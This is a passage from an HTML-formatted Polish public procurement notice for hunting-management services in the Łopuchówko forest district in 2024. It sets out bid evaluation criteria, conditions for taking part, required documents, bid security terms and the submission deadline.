ramach środków finansowych, którymi Zamawiający dysponować<br/>będzie w trakcie realizacji zamówienia.<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich<br/>zlecenie. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">3.10. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7) PZP, w okresie 3 lat od dnia udzielenia<br/>zamówienia podstawowego.<br/>3.11. Zamówienia, o których mowa w pkt 3.10. będą polegały na powtórzeniu usług zgodnych z usługami stanowiącymi przedmiot niniejszego zamówienia oraz usług podobnych do nich w aspekcie technologicznym ich wykonawstwa. Zakresem rzeczowym usług stanowiących przedmiot zamówień, o których mowa w pkt 3.10. objęte będą prace z zakresu: zagospodarowanie łowiska, w tym uprawa poletek łowieckich, dokarmianie zwierzyny, konserwacja i naprawa urządzeń łowieckich, a także obsługa polowań<br/>zbiorowych, obejmujące czynności wskazane rodzajowo w załączniku nr 11 i 12 do SWZ, które w związku z zagwarantowaniem<br/>prawidłowej gospodarki łowieckiej stały się konieczne do wykonania w następstwie lub w związku ze zdarzeniami przyrodniczymi,<br/>klimatycznymi lub atmosferycznymi.<br/>3.12. Szczegółowy opis standardu technologii wykonawstwa prac wchodzących w skład zamówień, o których mowa w pkt 3.10.<br/>zawarty został w Załączniku nr 11 i 12 do SWZ.<br/>3.13. Zakres rzeczowy usług stanowiących przedmiot zamówień, o których mowa w pkt 3.10. nie przekroczy wartości 10,00%<br/>wartości niniejszego zamówienia. Wartość przewidywanych zamówień, o których mowa w pkt. 3.10. SWZ stanowić będzie do 10,00% wartości szacunkowej całkowitego wynagrodzenia Wykonawcy wraz z prawem opcji.<br/>3.14. Zamówienia, o których mowa w pkt 3.10. będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.<br/>3.15. Zamówienia, o których mowa w pkt. 3.10. będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego<br/>usług stanowiących przedmiot zamówienia na skutek warunków przyrodniczych bądź atmosferycznych lub powierzenia<br/>Zamawiającemu nowych zadań gospodarczych lub publicznych, jak również w sytuacji braku możliwości wyłonienia z przyczyn obiektywnych wykonawców usług łowieckich w ramach podstawowych trybów udzielania zamówień, celem zabezpieczenia niezbędnego wykonawstwa prac oraz w przypadku powierzania wykonawcy prac stanowiących wykonawstwo zastępcze w stosunku do prac realizowanych przez innego wykonawcę.<br/>Miejscem realizacji zamówień, o których mowa w pkt 3.10. będzie obszar administracyjny Nadleśnictwa Łopuchówko.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione za pomocą poniższych kryteriów oceny ofert, którym przypisano następujące<br/>wagi procentowe:<br/>- Cena - 60%,<br/>- Samodzielna realizacja kluczowych elementów (części) zamówienia - 40%.<br/>Sposób obliczania wartości punktowej ocenianego kryterium:<br/>Kryterium nr 1 – „Cena”:<br/>Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę<br/>w formularzu ofertowym. Zamawiający, ofercie o najniższej cenie przyzna 60,00 punktów (wartość punktowa obliczona z<br/>dokładnością do dwóch miejsc po przecinku), a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie<br/>mniejsza, według wzoru:<br/><br/> najniższa oferowana cena brutto<br/>Cena = ----------------------------------------------------------- x 60 % x 100 pkt.<br/> cena badanej oferty brutto<br/><br/>Maksymalna liczba punktów w kryterium „cena” wynosi: 60,00 pkt.<br/>Kryterium nr 2 – „Samodzielna realizacja kluczowych elementów (części) zamówienia”:<br/>W ramach kryterium „Samodzielna realizacja kluczowych elementów (części) zamówienia” oceniane będzie przyjęcie przez<br/>Wykonawcę zobowiązania umownego do wykonywania kluczowych elementów (części) zamówienia, określonych przez<br/>Zamawiającego w SWZ, samodzielnie przez Wykonawcę składającego ofertę, tj. bez udziału podwykonawców. Zasady realizacji<br/>tego zobowiązania oraz zasady odpowiedzialności za jego niewykonanie zostały opisane we wzorze umowy (stanowiącym załącznik<br/>nr 10 do SWZ). We wzorze umowy (stanowiącym załącznik nr 10 do SWZ) zobowiązanie do wykonywania kluczowych elementów<br/>(części) zamówienia, określonych przez Zamawiającego w SWZ, samodzielnie przez Wykonawcę składającego ofertę, tj. bez<br/>udziału podwykonawców jest określane jako „Obowiązek Samodzielnej Realizacji”.<br/>Kluczowe elementy (części) zamówienia dla przedmiotowego zamówienia obejmują następujące czynności: „obsługa polowań<br/>zbiorowych”.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do samodzielnej realizacji kluczowych części<br/>zamówienia w Ofercie (załącznik nr 1 do SWZ). Brak wskazania w Ofercie przyjęcia przez Wykonawcę zobowiązania, o którym<br/>mowa w zdaniu poprzednim będzie uznawane jako nieprzyjęcie takiego zobowiązania, a Oferta Wykonawcy uzyska 0,00 pkt w<br/>ramach niniejszego kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40,00 pkt.<br/>Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny<br/>ofert. Oferta może uzyskać maksymalnie 100,00 punktów. Zamawiający obliczy punkty liczbowo z dokładnością do dwóch miejsc po<br/>przecinku, zaokrąglając zgodnie z zasadami matematycznymi.<br/>Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans<br/>ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną lub najniższym<br/>kosztem, a jeżeli złożone zostały oferty o takiej samej cenie lub koszcie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty<br/>do złożenia w terminie określonym przez Zamawiającego, tj. w wyznaczonym przez siebie terminie, tj. w terminie do 3 dni roboczych<br/>liczonych od dnia następnego po otrzymaniu wezwania, ofert dodatkowych.<br/>Wykonawcy składając oferty dodatkowe nie mogą zaoferować cen lub kosztów wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych elementów (części) zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w zakresie<br/>sytuacji ekonomicznej i sytuacji finansowej.<br/>4) zdolności technicznej lub zawodowej:<br/>a) warunek w zakresie doświadczenia:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału w postępowaniu.<br/>b) w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony,<br/>jeśli Wykonawca wykaże, że dysponuje (lub będzie dysponował) co najmniej 6 osobami, które pełnić będą funkcję<br/>naganiaczy podczas polowań zbiorowych.<br/>UWAGA: Zamawiający nie określa szczególnego sposobu spełniania określonego wyżej warunku, przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (Zamawiający nie korzysta z dyspozycji zawartej w art. 117 ust. 1<br/>ustawy Pzp),<br/>c) warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje:<br/>- co najmniej 1 szt. pojazdu do przewozu myśliwych (pojazd co najmniej 5 – osobowy), przystosowany do warunków<br/>terenowych,<br/>- co najmniej 1 szt. pojazdu do przewozu osób do naganki (pojazd co najmniej 5 – osobowy), przystosowany do warunków<br/>terenowych,<br/>- co najmniej 1 szt. pojazdu przystosowanego do transportu upolowanej zwierzyny.<br/>7.2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale nr 9 SWZ.<br/>7.3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, usługi lub dostawy, do realizacji których te zdolności są wymagane.<br/>7.4. Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP w zw. z art. 266 ustawy Pzp może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Z-cy przed udzieleniem zamówienia z art. 274 ust. 1 Pzp,wezwie W-cę,którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie,nie krótszym niż 5 dni od dnia wezwania,aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>a)informację z KRK z:(a) art.108 ust.1 pkt 1 i 2 PZP,(b)art.108 ust.1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego-wystawioną nie wcześniej niż 6 m-cy przed jej złożeniem,<br/>b)oświadczenie W-cy z art.108 ust.1 pkt 5 PZP,o braku przynależności do tej samej grupy kapitałowej,w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów,z innym W-cą,który złożył odrębną ofertę lub ofertę częściową,albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dok. lub info.potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego W-cy należącego do tej samej grupy kapitałowej wg zał. nr 6 do SWZ,<br/>c)odpis lub informacje z KRS lub z CEIiDG z art.109 ust.1 pkt4) PZP, sporządzonych nie wcześniej niż 3 m-ce przed jej złożeniem,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>d)oświadczenia w-cy o aktualności info.zawartych w oświadczeniu,o którym mowa w art. 125 ust. 1 PZP,w zakresie podstaw<br/>wykluczenia z postępowania określonych w Pzp (zał.9 do SWZ):<br/>- art.108ust. 1 pkt. 3,<br/>- art.108ust. 1 pkt. 4 dot.orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art.108ust.1 pkt. 5 dot.zawarcia z innymi w-cami porozumienia mającego na celu zakłócenie konkurencji,<br/>- art.108 ust. 1 pkt. 6,<br/>- art.109 ust. 1 pkt. 5,7-8 ,<br/>- art.7 ust. 1 pkt 1–3 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1) informacji z Krajowego Rejestru Karnego, o której mowa w pkt 9.3. lit. a) SWZ - składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie, o którym mowa w pkt 9.3. lit a) SWZ,<br/>2) odpisu albo informacji z KRS lub z CEIiDG,o których mowa w pkt9.3. lit c) SWZ - składa dokument lub dokumenty wystawione w<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza<br/>nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury.<br/>Jeżeli w kraju w którym W-ca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba,której dokument<br/>dotyczy,nie wydaje się dokumentów,o których mowa w pkt.9.5SWZ,lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków,o których mowa w art.108 ust. 1 pkt 1, 2 i 4 PZP, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie W-cy,ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji,lub<br/>oświadczenie osoby,której dok. miał dotyczyć,złożone pod przysięgą lub, jeżeli w kraju,w którym W-ca ma siedzibę lub miejsce<br/>zamieszkania lub miejsce zamieszkania ma osoba,której dokument miał dotyczyć,nie ma przepisów o oświadczeniu pod<br/>przysięgą,złożone przed organem sądowym lub administracyjnym, notariuszem,organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania osoby, której<br/>dokument miał dotyczyć. Postan.pkt. 9.6. stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w pkt. 7.1. SWZ, Zamawiający przed udzieleniem zamówienia, działające na podstawie art. 274 ust. 1 ustawy Pzp wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących<br/>podmiotowych środków dowodowych:<br/>a) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wzór wykazu osób dostępnych Wykonawcy w celu wykonania zamówienia stanowi załącznik nr 7 do SWZ,<br/>b) wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy. Wykonawca w wykazie wskazuje rodzaj urządzenia, opis urządzenia (marka, model, nr seryjny, nr rejestracyjny lub inne oznaczenie pozwalające na indywidualizację), podstawę do dysponowania – wykaz stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 14.1. SWZ wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę zawierającą:<br/>a) Formularz Oferty sporządzony wg wzoru stanowiącego Załącznik nr 1 do SWZ sporządzony pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>b) Kosztorys Ofertowy (sporządzony wg wzoru stanowiącego załącznik nr 2 do SWZ, sporządzony pod rygorem nieważności, w formie elektronicznej (tj. sporządzone pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym);<br/>c) oświadczenia sporządzone zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez:<br/>- Wykonawcę,<br/>- każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w przypadku wspólnego ubiegania się o<br/>udzielenie zamówienia),<br/>- każdego z podmiotów udostępniających Wykonawcy zasoby na zasadzie art. 118 Pzp (o ile Wykonawca polega na<br/>zasobach innych podmiotów),<br/>d) oświadczenia, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ, pod rygorem nieważności w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób<br/>upoważnionych do reprezentacji podmiotu udostępniającego Wykonawcy zasoby na zasadzie określonej w art. 118 w zw. z<br/>art. 226 Pzp, o ile dotyczy,<br/>e) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 9.4. SWZ, jeżeli Wykonawca<br/>wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania<br/>zamówienia stanowi załącznik nr 5 do SWZ), o ile dotyczy,<br/>f) odpis lub informacja z KRS, CEIiDG lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu<br/>Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz<br/>danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów,<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania W-cy, osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia lub osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp, jeżeli w imieniu W-cy, wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118<br/>ustawy Pzp – działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt.<br/>13.7. lit. e) SWZ, sporządzone w sposób określony w pkt. 9.13. – 9.22. SWZ,<br/>h) wadium w oryginale w postaci elektronicznej (tylko wtedy, gdy Wykonawca wnosi wadium w formie niepieniężnej).<br/>W-ca, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, składa wraz z ofertą (zgodnie z zapisami pkt. 9.4. SWZ):<br/>1)zobowiązanie podmiotu udostępniającego zasoby wg zał nr 5 do SWZ,<br/>2)oświadczenie podmiotu udostępniającego zasoby,potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu wg zał nr 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.1. Zamawiający wymaga wniesienia wadium w wysokości: 1 000,00 zł.<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>11.2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2023 r. poz. 462 z późn. zm.).<br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku Bank<br/>Ochrony Środowiska S.A. nr rachunku: 03 1540 1056 2105 8312 9120 0006 z dopiskiem: wadium na zabezpieczenie oferty<br/>w postępowaniu na: „Wykonywanie usług z zakresu gospodarki łowieckiej w Nadleśnictwie Łopuchówko w 2024 roku”.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym<br/>Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>11.6. Treść wadium wnoszonego w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) SWZ musi<br/>zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib;<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Pozostałe informacje dotyczące wadium zawarte są w rozdziale nr 11 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2)oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)oświadczenia, o których mowa w art. 125 ust. 1 Pzp, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu oraz<br/>oświadczenie o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 3 do SWZ) składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu<br/>w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu. Oświadczenia<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z<br/>ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>4)dokumenty, o których mowa w pkt 9.3. SWZ obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia,<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dotyczące oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 10 do SWZ. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej<br/>z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w paragrafie nr 16 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-08 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy e-Zamówienia (&#34;Platforma&#34;), która jest dostępna pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia 